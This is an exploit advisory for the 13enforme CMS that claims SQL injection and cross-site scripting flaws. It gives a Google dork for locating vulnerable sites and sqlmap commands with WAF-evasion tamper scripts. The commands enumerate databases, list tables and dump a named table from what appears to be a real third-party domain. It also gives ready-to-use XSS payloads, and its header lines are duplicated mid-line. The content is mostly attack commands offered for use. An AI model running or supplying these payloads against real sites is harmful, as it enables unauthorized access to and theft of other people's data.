# Exploit Title: 13enforme CMS SQL Injection & XSS Vulnerability
# Google Dork:intext:"13enForme" +inurl:.php?id=
# Date: 2020-04-03
# Exploit Author: @ThelastVvV< # Exploit Title: 13enforme CMS SQL Injection & XSS Vulnerability
# Google Dork:intext:"13enForme" +inurl:.php?id=
# Date: 2020-04-03
# Exploit Author: @ThelastVvV
# Vendor Homepage: http://www.13enforme.com
# Version: 1
# Tested on: Ubuntu

---------------------------------------------------------

PoC 1:
The attacker once locate the sql vulnerability can perform an automated process to exploit the secruity in the webapp
Payload(s)

http://www.site.com/content.php?id=[]'[SQL INJECTION VULNERABILITY!]

SQLMAP Payload(s):

sqlmap -u https://www.henokiens.com/content.php?id=99 --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" --dbs

sqlmap -u https://www.henokiens.com/content.php?id=99 --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" -D db538822134 --tables

sqlmap -u https://www.henokiens.com/content.php?id=99 --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" --dump -D db538822134 -T plv




PoC 2 :

XSS Vulnerability

Payload(s) :

"><img src=x onerror=prompt(document.domain);>

use payload:

https://www.example/content.php?id=5&lg=%22%3E%3Cimg%20src=x%20onerror=prompt(document.domain);%3E

www.anysite.com/file.php?id="><img src=x onerror=prompt(document.domain);>